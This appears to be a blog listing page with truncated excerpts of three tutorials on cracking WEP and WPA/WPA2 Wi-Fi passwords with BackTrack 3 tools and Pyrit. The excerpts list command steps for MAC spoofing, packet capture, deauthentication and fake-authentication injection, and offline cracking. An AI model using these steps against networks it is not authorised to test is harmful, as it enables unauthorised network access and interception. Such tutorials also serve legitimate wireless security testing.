HowTo: Crack WPA with Backtrack 3

This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes. Steps: airmon-ng stop wlan0 ifconfig wlan0 down macchanger –mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 airodump-ng wlan0 airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0 aireplay-ng -0 5 -a (bssid)wlan0 aircrack-ng […]

HowTo: Crack WEP with BackTrack 3

This is a tutorial on how to crack a wep encrypted password. This information should only be used for education purposes. Steps: airmon-ng stop wlan0 ifconfig wlan0 down macchanger –mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 airodump-ng wlan0 airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0 aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0 aireplay-ng […]

Wireless WPA/WPA2-PSK GPU Cracking with Pyrit – How to Use Pyrit in BackTrack

Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff.  Pyrit works with many platforms including CUDA, ATI-Stream, OpenCL and VIA Padlock. How toListing available cores pyrit list_cores Determining performance of cores pyrit benchmark Create a new ESSID pyrit […]